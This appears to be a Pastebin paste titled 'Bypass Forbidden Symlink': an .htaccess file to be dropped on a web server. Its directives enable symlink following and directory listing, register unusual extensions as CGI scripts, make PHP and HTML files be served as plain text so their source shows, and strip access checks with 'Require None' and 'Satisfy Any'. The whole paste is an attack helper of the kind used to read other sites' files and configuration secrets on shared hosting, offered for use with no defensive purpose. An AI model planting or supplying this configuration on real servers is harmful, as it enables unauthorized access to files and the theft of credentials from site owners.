Advertisement
1337_Brain

Bypass Forbidden Symlink

Jul 15th, 2014
678
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.43 KB | None | 0 0
  1. //Save as .htaccess
  2.  
  3.  
  4. AddHandler application/x-httpd-php4 .php .php4 .php3
  5. Options +FollowSymLinks +Indexes
  6. DirectoryIndex default.html
  7. AddType text/html php
  8. Options +ExecCGI
  9. AddHandler cgi-script cgi pl xt
  10.  
  11. AddHandler cgi-script cgi pl tg love h4 tgb cbg lta izo vic
  12.  
  13. DirectoryIndex Sux.html
  14. AddType text/plain .php
  15. AddHandler server-parsed .php
  16. AddType text/plain .html
  17. AddHandler txt .html
  18. Require None
  19. Satisfy Any
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement